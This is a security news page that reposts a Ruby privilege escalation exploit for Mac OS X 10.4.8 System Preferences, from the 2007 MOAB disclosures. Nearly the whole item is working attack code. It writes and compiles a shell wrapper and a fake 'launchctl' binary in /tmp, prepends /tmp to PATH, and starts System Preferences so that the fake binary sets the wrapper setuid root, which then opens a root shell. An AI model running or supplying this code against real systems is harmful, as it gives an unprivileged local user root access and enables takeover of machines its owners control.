_
_ _ 11.21.2008
 
_ Navigation: _
Main Page Technology Downloads Security Entertainment Videos
Search Site: Advanced
_
 
Login Login
 
Register Register
   
_ News Item

Mac OS X 10.4.8 System Preferences Local Privilege Escalation Exploit

Jan 22 2007 18:55:08
Source: ace
vote bad  vote good
0
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M.

Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-21-01-2007: OS X, making root shells easier each day.
#

SHELL_WRAP = 'int main() { system("/bin/sh -i"); return 0; }'
SHELL_PLANT = 'int main() { system("chown root: /tmp/shX; chmod 4755 /tmp/shX"); return 0; }'
PREFS_BINPATH = '/Applications/System\ Preferences.app/Contents/MacOS/System\ Preferences'

COMMAND_LINE = "echo '#{SHELL_WRAP}' > /tmp/t.c &&" +
"cc -o /tmp/shX /tmp/t.c &&" +
"echo '#{SHELL_PLANT}' > /tmp/t.c &&" +
"cc -o /tmp/launchctl /tmp/t.c &&" +
'export PATH="/tmp/:$PATH" &&' +
"#{PREFS_BINPATH} &"

def escalate()
system COMMAND_LINE
puts "++ Click on Sharing and then click on Windows Sharing..."
sleep 30 # make sure you have "time"
system "/tmp/shX"
end

escalate()
.

» full story @ source-link: ace
Related Articles:
» Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
» S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
» PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
» SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
_ Comments
Add Comment
You must be registered and logged in to add comments!

Register
Login
_ Sponsors

_ Sponsors